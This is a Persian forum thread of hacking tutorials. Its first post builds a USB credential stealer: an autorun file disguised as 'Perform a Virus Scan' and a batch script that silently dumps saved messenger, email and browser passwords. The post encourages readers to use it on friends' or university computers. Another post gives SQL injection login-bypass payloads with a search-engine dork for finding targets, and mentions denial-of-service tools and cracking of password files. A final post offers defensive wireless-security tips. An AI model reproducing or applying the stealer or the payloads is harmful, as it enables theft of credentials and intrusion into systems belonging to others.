تالار گفتمان نبض فردا  

بازگشت   تالار گفتمان نبض فردا > کامپیوتر و اینترنت > اینترنت و شبکه

اطلاع رسانی

ارسال موضوع جدید  پاسخ
 
ابزارهای موضوع نحوه نمایش
قدیمی 07-24-2012   #101
Mino
عضو تالار
 

تاریخ عضویت: Feb 2012
محل سکونت: خوزستان، اهواز،
نوشته ها: 802
تشکرهای ایشان: 22,059
33,363بار در12,628پست از ایشان تشكر شده است

صندوق مدال ها

پیش فرض

با فلش مموري هك نماييد











توجه : مطلب اين بخش تنها به دليل آموزش خطرهاي عدم رعايت نكات امنيتي بر روي كامپيوترتان آورده شده اند و هر گونه سوء استفاده از مطالب آن بر طبق قوانين، مستوجب پيگرد قانوني است.

امروز یه روش جالب برای هك تمامی پسوردهای موجود در یك كامپیوتر به شما آموزش خواهم داد، ابتدا توضیح بدم این روش بسیار ساده شما می توانید با یك فلش و اتصال اون به هر كامپیوتری بدون هیچ مشكل پسوردها رو در داخل فایل TXT ذخیره سازی كنید و در فرصت مناسب تری آنها رو مشاهده نمایید، شما در این روش می توانید به پسوردهای مسنجر از جمله MSN, Yahoo, AOL, Windows messenger و پسورد اكانتهای ذخیره شده در Outlook Express, SMTP, POP, FTP و یوزر و پسوردهای ذخیره شده در فایرفاكس و اینترنت اكسپلورر دسترسی پیدا كنید، این روش را می توانيد بر روی امپيوتر دوستانتان یا كامپیوتر دانشگاهتان امتحان كنید و از نتیجه اون شگفت زده خواهید شد.
برای ساخت این ابزار هك باید شما رو با چند نرم افزار آشنا كنم



MessenPass: بازیابی یوزرنیم و پسورد نرم افزارهای مسنجر MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM

[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]



Mail PassView: بازیابی یوزرنیم و پسورد نرم افزارهای مدیریت ایمیل مانند Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free شما با این نرم افزار می توانید اكانت های HotMail, Yahoo!, Gmail را نیز هك كنید
[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]



IE Passview: ابزار كوچكی است كه به وسیله آن یوزرنیم و پسوردهای ذخیره شده در مرورگر اینترنتی اینترنت اكسپلوره را مشاهده نمایید این نرم افزار بر روی IE نسخه 7 و v4.0 – v6.0 به خوبی كار می كند
[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]


Protected Storage PassView: بازیابی تمامی پسوردهای كه در Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords و ... ذخیره شده
[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]



PasswordFox: PasswordFox ابزار كوچكی است كه به شما اجازه مشاهده پسورد و نام كاربری های موجود در موزیلا فایرفاكی و دریگر مرورگرها كه بصورت پیشفرض خیره شده و مربوط به پروفایلهای مختلف است را دریافت كنید و شامل Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename میباشد
[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]
این مرحله شامل آشنایی با نرم افزارهایی بود كه قرار با اونها كار كنیم
ابتدا شما این 5 نرم افزار را كه معرفی كردم را دانلود كنید و پس از خارج كردن اونها از فایل zip فایلهای .EXE اونها رو به فلشتون منتقل كنید یعنی فایلهای mspass.exe, mailpv.exe, iepv.exe, pspv.exe و passwordfox.exe رو باید كپی كنید


اكنون Notepad را باز كنید و دستور زیر را واد نمایید

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

حالا فایل رو save كنید سپس نام فایلتان را كه New Text Document.txt نام دارد به autorun.inf تتغییر دهید
حالا فایل autorun.inf را copy كنید به فلشتان

یك بار دیگر notepad را باز كنید این بار این كد را وارد نمایید

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt



حالا فایل رو save كنید سپس نام فایل رو از New Text Document.txt به launch.bat تغییر دهید و launch.bat را داخل فلش دیسكتان copy كنید
حالا همه چی آماده هست و شما می توانید پسوردهای موجود بر روی هر كامپیوتری كه دلتان میخواهد بدست آورید
1- شما فلش رو به كامپوتر متصل میكنید و حالت autorun بصورت pop-up باز میشود
2- بر روی پنجره pop-up كه باز شده شما گزینه اول را كه (Perform a Virus Scan) است انتخاب میكنید
3- حالا به سرعت تمام پسوردها در یك چم بهم زدن بر روی فایلهای TXT ذخیره میشوند

شما میتوانید با كمی ویرایش در كدهای بالا مسیر ذخیره سازی TXT حاوی پسورد ها را در فولدر دیگری ذخیره كنید.


نكته : در ویندوز 7 كه بصورت پیشفرض حالت autorun غیر فعال شده یا بر روی ویندوزهایی كه این عمل انجام شده شما می توانید بر روی فایل Lunch.bat كلیك كنید یا بر روی درایو فلش راست كلیك كنید و Autorun را انتخاب كنید




















توجه : مطلب اين بخش تنها به دليل آموزش خطرهاي عدم رعايت نكات امنيتي بر روي كامپيوترتان آورده شده اند و هر گونه سوء استفاده از مطالب آن بر طبق قوانين، مستوجب پيگرد قانوني است.
Mino آنلاین نیست.   پاسخ با نقل قول
Sponsored Links
قدیمی 07-24-2012   #102
Mino
عضو تالار
 

تاریخ عضویت: Feb 2012
محل سکونت: خوزستان، اهواز،
نوشته ها: 802
تشکرهای ایشان: 22,059
33,363بار در12,628پست از ایشان تشكر شده است

صندوق مدال ها

پیش فرض

منتها در کل متفاوت با مطالبی که خوندید تا حالا در این مورد. دیگه در این مطلب نمیخونید که tcp ip چی هست و کار پورتها رو نخواهید خواند. و جبرا نباید کار کل پورتهارو از حفظ بشید.
خیلی ساده اشاره خواهم کرد که چه چیز نیاز دارید که هنگ نکنید و ذکر خواهم کرد علومی که یک هکر نیاز داره تا هکر توانمندی باشد.







1- آشنایی با خط فرمان command line

اولین ابزاری که یک هکر رو توانمند میکنه دستورات خط فرمان هست، فرقی نمیکنه ویندوز یا لینوکس، باید کاملا آشنا باشید اگر نباشید یک جایی هنگ خواهید کرد، یادمه سال 77-78 که کلاس رایانه میرفتیم اول dos رو یاد میگرفتیم بعد ویندوز 3.2 ! بعد ویندوز 95. ولی الان داس اینها جمع شده و بجز هکر ها و بانک های توسعه یافته ایرانی کسی ازش استفاده نمیکنه. مثال میزنم ببینید داس چه برنامه نازیه: start/run/[type]cmd و تایپ ping فاصله ؟/ یا اصلا تایپ help ببینید چی جواب میده.

2- آشنایی با ساختار سایتها

یادمه از سال 2000 واسه خودم وبسایت داشتم، بار اول که لاگین کردم نمیدونستم index رو کجا باید آپلود کنم ولی مدتی بعد اونقدر سایت و سرور رو انگولک کردم که صاحب سرور بیرونم کرد و پول منو خورد(اون زمان هاست گرون بود).
حالا شما فرض کن من الان با سرور چیکار میکنم، باز هم فرقی نمیکنه ویندوز یا لینوکس. ساده گفتم گیرنده شمایی

3- آشنایی با سرورها و سیستم عامل ها
یکی از مسائل مهم آشنایی با سرورها و سیستم عامل ها هست، فرض کنید شما وارد یک شهری شدید و میخواهید مدتی اونجا زندگی کنید، اول باید چیکار کنید؟ محل زندگی و پاتوق داشته باشید، دوم نانوایی رو بلد باشید که گرسنه نمونید، بقالی رو بلد باشید،پمپ بنزین رو بلد باشید. با همسایه هاتون آشنا بشید، بدونید کسی که دیروز یک کاسه آش نطری آورد کدوم همسایه هست یا اونی که زده آینه ماشین شما رو شکونده کدومه الا آخر... پس اگر بلد نباشید به هیچ دردی نمیخورید. بهترین گزینه برای شروع 127.0.0.1 هست (از گوگل بپرس).

4- آشنایی با ساختار application ها

یادمه سایتی داشتم که سیستم های مدریت محتوا رو راه اندازی میکردم. اگر مشتری هم نداشتم مینشستم و هر چی application دم دست بود نصب میکردم تا طرز کارشو یاد بگیرم.
ببینید بدون تعارف الان 99% نفوذ ها ها از طریق application انجام میشه بعد از اونه که نوبت میرسه به سرور،
سیستم های مدیریت محتوای سایت، مثل فروم ها ، وبلاگ های خصوصی، سایت های تفریحی و الا آخر... اگر بدونید این سیستم ها چطوری کار میکنن و ... مطمئن باشید به سرور همون سایت هم خواهید رسید.

5- آشنایی با database ها
اگر یک روزی یک سرور بزرگ هک کردین به دیتابیس (بانک اطلاعاتی) اون سرور هم نیاز خواهید داشت ( این قسمت به درد دیفیسر ها نمیخوره) برو بالاتر... پس حتما روی این نقطه تمرکز کنید و یاد بگیرید. نمیگم باید فول باشید، یاد بگیرید.
6- آشنایی با انواع حملات
برید با انواع حملات آشنا بشید، چون یک روزی به دردتون خواهد خورد،و هیچ وقت فکر نکنید چون چند تا حمله remote کردین هکر شدین.
به نظر من همه سرورهای دنیا باگ دارن و میشه هکشون کرد، و فکر نکنید یک باگ cpanel و چند تا xss و دو تا scanner روی سرور تست کردین باگ نداره، مطمئن باشین داره. پس آشنایی با حملات اینجا به دردتون میخوره
7- برنامه نویسی
شما یا باید یک برنامه نویس خوب باشید یا یک هکر خوب. یکی رو انتخاب کنید و برید دنبالش.
اینهایی که میگن من هم برنامه نویسم هم هکر دروغ میگن، کشکن.( خودتون میدونید کی رو میگم.)
8- زبانیکی از ابزارهای مهم شما زبان انگلیسی هست، اگر زبانتون خوب نیست برید کلاس زبان ثبت نام کنید که شدیدا بهش نیاز دارید.
9- یرهیز از برنامه های هک

هرگز دنبال برنامه های هک نرید، تست بکنید ولی استفاده نکنید، چون شمارو طبل تو خالی خواهد کرد.
10- ترس
میترسین سایت فلان شخص رو هک کنید ؟ پس هک رو فراموش کنید.
11- اراده قوی
اگر یک روزی یک لگد به میز کامپیوتر زدین و مانیتور (یا لبتاپ) رو پرت کردین وسط اتاق...
برید جمعش کنید و از نو شروع کنید، شما میتونید.
جمع:
اطلاعات+ اراده = هکر
موفق باشید، یاشار فرازی
تذكر: يكي از ساب هكر هاي قديمي ايران(تو زون اچ سايت هاش ماله سال 2005 هست))
Mino آنلاین نیست.   پاسخ با نقل قول
قدیمی 07-24-2012   #103
Mino
عضو تالار
 

تاریخ عضویت: Feb 2012
محل سکونت: خوزستان، اهواز،
نوشته ها: 802
تشکرهای ایشان: 22,059
33,363بار در12,628پست از ایشان تشكر شده است

صندوق مدال ها

پیش فرض

آشنایی با پروتکل tcp/ip و udp و icmp


فايل ضميمه
  • [نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ] (137.4 كيلو بايت, 2 نمايش)
Mino آنلاین نیست.   پاسخ با نقل قول
قدیمی 07-24-2012   #104
Mino
عضو تالار
 

تاریخ عضویت: Feb 2012
محل سکونت: خوزستان، اهواز،
نوشته ها: 802
تشکرهای ایشان: 22,059
33,363بار در12,628پست از ایشان تشكر شده است

صندوق مدال ها

پیش فرض



Maximum Security: A Hacker's Guide to Protecting Your Internet Site and Network

[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]
Mino آنلاین نیست.   پاسخ با نقل قول
قدیمی 07-24-2012   #105
Mino
عضو تالار
 

تاریخ عضویت: Feb 2012
محل سکونت: خوزستان، اهواز،
نوشته ها: 802
تشکرهای ایشان: 22,059
33,363بار در12,628پست از ایشان تشكر شده است

صندوق مدال ها

پیش فرض

رخنه بزرگ در بزرگ ترین شركت امنیتی در جهان




















ممكن است سیمانتك به عنوان یكی از بزرگ ترین شركت های امنیتی در جهان، به افزایش امنیت خود نیاز داشته باشد، چرا كه یك هكر كد منبع صنعت پیشروی برنامه آنتی ویروس این شركت را دزدیده است.

به گزارش انجمن دانشجویان خبرنگار ایسنا، یك تحلیلگر به شبكه خبری فاكس نیوز گفته است: احتمالا این كد كه از این غول امنیتی دزدیده شده، بر تعداد زیادی از كاربران رایانه تاثیری نخواهد گذاشت و یا با رایانه آن ها سازش می كند، اما این رخنه مایه آبروریزی و خجالت شركت هایی مثل فرچون (از بزرگ ترین شرکت های آمریکایی از نظر درآمد) خواهد بود.

Mino آنلاین نیست.   پاسخ با نقل قول
قدیمی 07-24-2012   #106
Mino
عضو تالار
 

تاریخ عضویت: Feb 2012
محل سکونت: خوزستان، اهواز،
نوشته ها: 802
تشکرهای ایشان: 22,059
33,363بار در12,628پست از ایشان تشكر شده است

صندوق مدال ها

پیش فرض

با دانستن IP یک شخص مثلآ در چت چه کارهایی می توان انجام داد؟

آیا با دانستن IP یک نفر میشه از طریق برنامه Sub Seven کسی را هک کرد!!!*آیا کسی IP من را بداند می تواند مرا هک کند؟؟؟*یکی IP من را دارد و می گوید اگه فعلآ کار رو نکنی مانیتور تو رو می سوزونم آیا می تونه؟؟*و...... تصمیم گرفتم که یک سری از کارهایی که میشه با داشتن IP کرد براتون شرح بدم**قطع ارتباط شخصی با اینترنت :شما می توانید با استفاده از برنا مه هایی ماننده IP DISCONNECT یا Rocket و دانستن IP شخص مقابل او را از اینترنت بیرون بندازید**کند کردن سرعت ارتباط شخصی با اینترنت:با استفاده از برنامه هایی مانند vai-te-ja-icmp Bomber و... با فرستادن Packet های بسیار در یک زمان سرعت شخص را کاملا کاهش دهید....**پیدا کردن پورت های باز:وقتی که IP یک فرد را داشته باشید میتوانید با اشتفاده از برنامه های Port Scanner سیستم شخص مقابل را جستجو کنید و اگر پورت باز وجود داشت در صورت امکان از آن استفاده کنید**یافتن تروجان فعال در سیستم مقابل:خوب مانند بالا بعضی از برنامه ها با دادن IP یک دستگاه آن دستگاه را برای تروجان های فعال جستجو می کند و اگر پورت بازی مربوط به یک تروجان را پیدا کند به شما گزارش میدهد**اما آیا می توان با داشتن IP یک شخص می توان با برنامه هایی مانند Sub Seven و... به سیستم قربانی حمله کرد؟در حالت عادی خیر یعنی اینکه برای کار کردن با برنامه های تروجان مانند Sub Seven باید یک Server در سیستم قربانی فعال شود.پس در نتیجه اگر قبلآ فایل سروری بر روی سیستم قربانی باز نشده باشد یا اینکه فایل سرور بر روی سیستم او موجود نباشد هیچ کاری با برنامه های تروجان نمی توان کرد***چگونه کاری کنیم که هیچ کسی نتواند آسیبی از طریق دانستن IP ما به ما برساند؟خوب تنها کاری که شما باید انجام بدهید استفاده از یک فایر وال )دیوار آتش) در سیستم خودتان می باشد.این برنامه ها پورت های بازه شما رو بسته و شما رو در مقابل حمله احتمالی از طریق IP و همچنین دسترسی برنامه های مشکوک به اینترنت(برای ارسال یا دریافت)محدود می کند.برنامه هایی مانند Zone Alarm -Tiny Personal -Firewall و..









چگونه سرورها هک مي شوند

سرور چيزي نيست جز يک کامپيوتر که تعدادي فايل و دايرکتوري روي ان ذخيره شده . سيستم عامل اين کامپيوتر به گونه ايست که علاوه بر دسترسي مستقيم به ان ( تا اينجا مثل هر کامپيوتري) اجازه ميدهد که افراد از کامپيوتر هاي ديگري که از طريق يک شبکه بدان کامپيوتر متصل اند به ان فايل ها دسترسي داشته باشند. اما براي دسترسي به اين فايل ها مقرراتي وجود دارد که همان admin معروف که سرپرستي اين شبکه را بر عهده دارد وضع ميکند. او دسترسي به بعضي فايل ها را محدود و به بعضي ديگر را مجاز ميسازد. يا براي دسترسي به فايل ها پس ورد هايي کي گذارد که تنها افراد خاصي بدان ها دسترسي داشته باشند.
تمام تلاش هکر دسترسي به اين فايل هاست که دسترسي بدين فايل ها بواسطه پس وردي محدود شده است.
پس تا اينجا واضح شد که هر کس براي دسترسي به اين فايل ها بايد حداقل با سيستم عامل ان سرور خاص اشنا باشد. و بعد نيز با شيوه دسترسي به اين فايل ها از راه دور (ftp).
حالا فرض کنيد که ان سيستم عامل يونيکس است و شما قصد داريد فايل اچ تي ام ال حاوي اطلاعات مربوط به صفحه اول سايتي دست يافته به جاي ان صفحهاي قرار دهيد که حاوي اسم شريفتان با ادرس ايميلتان است ( مثلا : "اين سايت توسط من "علی سلیمی" هک شد. اي ميل:XXXX@xxx.XXX") براي اين کار شما تلاش خواهيد کرد که مثل کامپيوتر خانه يتان وارد دايرکتوري مربوطه شده فايل x را انگولک کنيد.
ان اول ها انجام يک چنين کاري بسيار ساده بود اما هر چه مي گذرد دسترسي به اين فايل مشکل و مشکل تر ميشود ( البته هاست هاي ايران که هنوز عقب افتاده تر از اين حرفهايند)
مثال:
حالا فرض کنيد که اين سرور از ان نسبتا عقب مانده هاست و ما نيز قصد داريم به شيوه نسبتا بدوي و اما مهم از جنبه اموزشي ان فايل را انگولک کنيم.
ابتدا مواد مورد نياز:
دانستن دستورهاي ساده يونيکس :
HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD
همين ها بس است.
داشتن برنامهاي مثل Cracker Jack و يا مشابه مه بعدا مي گوييم چه کار مي کند.
حالا بايد راهي پيدا کرد که بر ان پس ورد لعنتي فائق امد ( که البته همه کار همين است )
در سيستم هاي بونيکس تمام پس ورد هاي سيستم در داخل فايلي که در دايرکتوري به نام :
/etc است قرار دارند. پس فايل ما ادرسش مي شود : /etc/passwd . اگر فکر مي کنيد که با دسترسي به اين فايل همه پس وردها از انه شماست و کار انجام شده ، در اشتباهيد. زيرا تمام اطلاعاته موجود در اين فايل به صورتي يک طرفه "کد" شده اند و عملا "decode " کردن ان ممکن نيست. پس چه بايد کرد:
ان برنامه اي که ان بالا اسمش را بردم (Cracker Jack) برنامه ايست که ان فايل کد شده را برداشته و سعي مي کند با تطبيق دادن ان با کلماتي از پيش معين . پس ورد هاي موجود در ان فايل را پيدا کند .(مثل کاري که يک باستان شناس براي خواندن خط باستاني مي کند).
پس کل عمليات ساده شد به دستسي به فايل پسوردها و کشف رمزها بواسطه ان برنامه .
نکته اينجاست که ان ادمين کذايي قرار نيست که پس ورد ها را دودستي به شما تقديم کند. براي دسترسي به ان فايل پس ورد ها بايد از ftp استفاده کنيد.












هک کردن سایت با استفاده از گوگل و SQL Injection



برای شروع کار ابتدا به گوگل بروید و در ان عبارت login.asp را سرچ کنید بعد حدود ۱۷ هزار سایت در گوگل به نمایش در می یاد که ادرس ان شبیه [نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ] است حالا روی یکی از سایتها که همچنین ادرسی را دارند کلیک کرده تا وارد قسمت login سایت شوید بعد به جای username عبارت admin را تایپ کنید و به جای پسورد or 1=1— را تایپ کنید و login کنید ممکن است سیستم امنیتی سایت بالا نباشد در این صورت error می دهد این پیغام ظاهر می شود :



The page cannot be displayed

There is a problem with the page you are trying to reach and it cannot be displayed.

ALL ODBC Error Messages

Microsoft OLE DB Provider for ODBC drivers error

Microsoft OLE DB Provider for ODBC drivers error '80040e14 '

[Microsoft][ODBC SQL Server] Incorrect syntax near the keyword 'or'.

/verify .asp, line .

Microsoft OLE DB Provider for ODBC drivers error '80040e14 '

[Microsoft] [ODBC SQL Server] Unclosed quotation mark before the

character string

Microsoft OLE DB Provider for ODBC Drivers error '80004005 '

[Microsoft][ODBC Microsoft Access Driver]

Microsoft JET Database Engine error '80040e14 '

حالا می فهمیم که سایت اسیب پذیر است و می توان انرا هک کرد و وارد بخش مدیریت شد اما اگر با چنین پیغامی Login Failed مواجه شدید امنیت سایت بالا است و به این سادگی ها هک نمی شود

اینهم چندین کد برای حمله به SQL Injection ها :

Username:admin

Password:' or'=*

Username:admin " or "a"="a

Password:' or'='











کامپیوترهای Client :
کامپیوترهایی که از شبکه و اطلاعات استفاده می کنند

کامپیوترهای Server :
کامپیوترهایی که وظیفه تامین اطلاعات و سرویس دهی را در شبکه بر عهده دارند

IP :
هر کامپیوتر متصل به اینترنت صرفنظر از اینکه آیا این کامپیوتر سرور است یا کلاینت یک شماره مخصوص منحصر به فرد دارد تا بتوان به وسیله آن شماره به کامپیوتر دسترسی داشت که IP می گویند. این عدد برای کامپیوترهای سرور و کامپیوترهایی که به غیر از روش Dilaup به اینترنت متصل می شوند عددی است ثابت و برای کامپیوترهای کلاینتی که به صورت Dialup به اینترنت متصل می شوند متغیر است که این عدد را هر بار که به ISP متصل می شویم به صورت تصادفی در اختیار ما قرار می دهد.

IP یک عدد 32 بیتی (چهاربایتی) است که به صورت زیر نوشته می شود xxx.xxx.xxx.xxx که منظور از xxx عددی بین 0 تا 255 می باشد .

پورت Port :
Port محلی که داده ها وارد و یا خارج می شوند (درگاههای ورود و خروج) در مبحث مربوط به هک با پورت هایی سروکار داریم که به هر کدام یک عددی نسبت می دهیم که این اعداد بین 1 و 655351 می باشند. هرکدام از پورت های فعال توسط یک نرم افزار مدیریت می شوند مثلا پورت 25 مخصوص ارسال ایمیل می باشد.



مخفی کردن Ip در برابر هکرها

در صورتی که تنها سررشته ای از هک و امنیت را داشته باشید میدانید که بسیاری از هکرها برای نفوذ به سیستم قربانی از IP او استفاده میکنند. با استفاده از این ترفند میتوانید کاری کنید که IP شما برای همیشه دور از دسترس این افراد باشد و به نوعی به طور کامل IP خودتان رو از دسترس دیگران مخفی نگه دارید.

برای این کار:
1- ابتدا از منوی Start به Run رفته و در محیط Run عبارت MMC را تایپ نمایید.
2- در محیط جدید ، از منوی File به قسمت Add/Remove Snap-in بروید.
3- در پنجره باز شده بر روی دکمه Add کلیک کنید.
4- در پنجره جدید ، بر روی IP Security Policy Management کلیک کرده و دکمه Add را بزنید.
5- سپس Finish را زده و خارج شوید.
6- در پنجره قبلی بر روی Ok کلیک کنید.
7- حال در همان محیط اولیه هستید. در حال حاضر آیکون کناری عبارت IP Security Policy Management زرد رنگ است. اکنون میبایست یکبار بر روی آن کلیک کنید تا رنگ آن به سبز تغییر پیدا کند.
8- در پایان از منوی File به Exit رفته و با انتخاب Yes این عملیات را ذخیره کنید.

پیدا کردن برخی اطلاعات از IP طرف مقابل:

می توانید با استفاده از سایت های زیر برخی از اطلاعات دست پیدا کنید:

[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]

[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]

[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ] (قسمت WHOIS/IPWHOIS Lookup)

[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]

در سایت آخر اگر نیاز به یوزر و پسوورد بود:

از طریق این سایت وارد کنید: [نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]

user name _ email addres: [نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]
pass: XVbqgHSx
Mino آنلاین نیست.   پاسخ با نقل قول
قدیمی 07-24-2012   #107
Mino
عضو تالار
 

تاریخ عضویت: Feb 2012
محل سکونت: خوزستان، اهواز،
نوشته ها: 802
تشکرهای ایشان: 22,059
33,363بار در12,628پست از ایشان تشكر شده است

صندوق مدال ها

پیش فرض

امنیت سبکه های بیسیم

بسیاری از کاربران به امید دستیابی به سرعت بالا و راحتی بیشتر از اینترنت بی سیم (Wireless) استفاده می کنند. همان طور که می دانیم ارتباط بی سیم مزایای خاص خود را دارد و در بین مردم بسیار محبوب می باشد به طوری که امروزه در اکثر مکان ها شاهد این تکنولوژی هستیم. راحتی کار، اتصال سریع، هزینه پایین، سطح پوشش بالا تنها قسمتی از مزیت های ارتباط بی سیم می باشد. اما قضیه در همین جا پایان نمی یابد! اینترنت بدون سیم نیز می تواند مشکلات خطرناکی را از لحاظ امنیتی ایجاد کند. در ادامه نکاتی را برای گام نهادن در بالا بردن امنیت شبکه های بی سیم به شما پیشنهاد خواهیم کرد.


[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ] ([نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ])


۱- نام کاربری و رمز عبور ( Admin ) خود را تغییر دهید

هسته مرکزی بیشتر شبکه های خانگی بی سیم، به مسیر یاب ها دسترسی دارند. برای تنظیم این قسمت، شرکت سازنده در داخل دستگاه، صفحه تنظیم اطلاعات را قرار داده است که به کاربر اجازه ورود و تغییر داده ها را می دهد. این ابزار توسط صفحه ورودی حمایت می شود و فقط به کاربر اصلی اجازه ورود می دهد. به هر حال هکرهای اینترنتی به راحتی می توانند به این امکانات دسترسی پیدا کنند. پس فورا این تنظیمات را تغییر دهید.

۲- قابلیت پنهان سازی WPA / WEP را فعال کنید

تکنولوژی بی سیم تلاش می کند پیغام را به گونه ای ارسال کند که به وسیله سایر دستگاه ها قابل خواندن نباشد. امروزه چنین تکنولوژی برای کپسوله سازی وجود دارد. طبیعتا شما خواستار انتخاب بهترین شکل از کپسوله سازی هستید که بتواند با ساده ترین تنظیمات کار کند. پس یرای این کار همه ی ابزار های (wireless) شبکه باید از تنظیمات کپسوله سازی شناخته شده ای استفاده کنند. محبوب ترین آن ها WEP / WPA می باشد که استفاده از آن ها را به شما توصیه می کنیم.

۳- SSID پیش فرض را تغییر دهید

همه نقاط دستیابی/مسیر یاب ها از نام شبکه ای استفاده می کنند که SSID نام دارد و کارخانه ها معمولا محصولاتشان را با SSID یکسان وارد بازار می کنند. برای مثال SSID همه دستگاه های شرکت LINKSYS، به طور عادی <Linksys> قرار داده شده اند. دانستن SSID به تنهایی موجب ورود دیگران به شبکه شما نمی شود ولی برای شروع نقطه ی خوبی است. مهم تر این است که هکر با دیدن SSID پیش فرض، برای ورود مشتاق تر می شود، چون می داند که شبکه به درستی تنظیم نشده است. پس SSID پیش فرض را تغییر دهید.
۴- پخش عمومی SSID را خاموش کنید

در شبکه های بی سیم، نقطه دستیابی یا مسیریاب به طور معمول نام شبکه (SSID) را تا فاصله ای مشخص پخش می کند. این خاصیت برای مشترکانی که در حال حرکت بین خارج و داخل این محدوده هستند، طراحی شده است. در منزل به این ویژگی نیازی نیست و این ویژگی، تعداد افرادی که دوست دارند به شبکه شما وارد شوند را افزایش می دهد. خوشبختانه بسیاری از wireless ها اجازه غیرفعال کردن ویژگی پخش عمومی SSID را به مدیر شبکه می دهد.


[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ] ([نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ])

۵- از ***** Mac Address استفاده کنید

هر قطعه از اجزای wireless، دارای یک شناسه منحصر به فرد است که آدرس فیزیکی یا Mac Address نام دارد. نقاط دستیابی و مسیریابی، Mac Address تمام دستگاه هایی که به آن وصل هستند را در خود دارد. توسط این ویژگی می توان MAC Address دستگاه هایی که می خواهیم به شبکه وصل شوند را وارد مودم کنیم و از پس فقط و فقط این دستگاه ها توانایی برقراری ارتباط را دارند. فقط توجه داشته باشید این ویژگی آنقدر که به نظر می رسد قدرتمند نیست و هکر ها به راحتی می توانند Mac Address ها را جعل کنند.

۶- اتصال خودکار شبکه های Wi-Fi را باز نکنید

اتصال به شبکه بی سیم باز، مانند شبکه بی سیم رایگان یا مسیریاب همسایه شما، کامپیوترتان را در معرض خطر امنیتی قرار می دهد. هر چند به طور معمول فعال نیست ولی بسیاری از کامپیوتر ها تنظیماتی در دسترس دارند که اجازه می دهد این اتصال بدون اطلاع کاربر اتفاق بیافتد.

۷- به ابزار ها Static IP اختصاص دهید

بیشتر شبکه های خانگی تمایل به داشتن IP Address های پویا دارند. تکنولوژی DHCP براستی، برای تنظیم کردن راحت است اما متاسفانه این مزیت، ابزاری برای دزدان شبکه می باشد. کسانی که می توانند به راحتی IP Address مجاز را از لیست DHCP شبکه شما بدست آورند. برای حفظ امنیت بیشتر از IP های ثابت استفاده کنید.


[نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ]
([نمایش لینک، فقط برای اعضای سایت امکان پذیر است. ])


۸- از Firewall استفاده کنید

مسیریاب های مدرن دارای Firewall های داخلی هستند اما گزینه هایی برای غیر فعال کردن آنها نیز موجود است. مطمئن شوید که Firewall مسیریاب شما روشن است. دیوار آتش از ورود غیر مجاز جلوگیری می کند و در صورت صحیح بودن کلیه تنظیمات، می تواند بسیاری از درخواست های آلوده را شناسایی کند.

۹- مسیریاب یا نقطه دستیابی را در مکانی امن قرار دهید

سیگنال های Wireless معمولا به خارج از خانه می رسند. نشت میزان کمی از سیگنال ها به بیرون مشکلی ندارد اما دسترسی بیشتر به این سیگنال ها کار را برای ردیابی و بهره برداری دیگران آسان می کند. موقعیت مسیریاب/نقطه دسترسی تعیین کننده این دسترسی می باشد. در ساده ترین حالت، دستگاه مرکز یک دایره می باشد و داده ها را توسط امواج به صورت دایره ای شکل ارسال می کند. پس بهتر است مودم در قسمت های مرکزی خانه قرار دهیم.

۱۰- شبکه را در دوره طولانی بی استفاده، خاموش کنید

اقدام نهایی برای امنیت wireless ها، خاموش کردن دستگاه در مدت زمانی (طولانی) است که از آن استفاده نمی کنید. برای مثال اگر قصد سفر دارید، بهتر است دستگاه را خاموش کنید تا از نفوذ هکرها جلوگیری نمایید.
Mino آنلاین نیست.   پاسخ با نقل قول
پاسخ


کاربران در حال دیدن موضوع: 1 نفر (0 عضو و 1 مهمان)
 

(View-All تعداد کاربرانی که این تاپیک را مشاهده کرده اند : 23
6r4y_l-l4t, anita_90, bersing_reza, dewnanas, hadi21hosseini, hnasserifar, keleis, m@ryam, merajok, mf12657, Mino, mirzaei, Moh@mm@d, mohammad678, mpeayn, nassern, REZA JOON, saeed.115@ yahoo.htm, salimnaze, shoroken, sirwan.bz, ssaeid, zia175
ابزارهای موضوع
نحوه نمایش

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید

BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است

انتخاب سریع یک انجمن


اکنون ساعت 15:34 برپایه ساعت جهانی (GMT - گرینویچ) +3.5 می باشد.


Powered by vBulletin Version 3.8.9
.Copyright ©2000 - 2017, Jelsoft Enterprises Ltd

Free Persian Language By Persian Forum Ver 3.0
« ثبت شده در پایگاه ساماندهی وزارت ارشاد »
مسئولیت متون درج شده در این پایگاه اینترنتی، بر عهده ی نویسنده ی آن می باشد.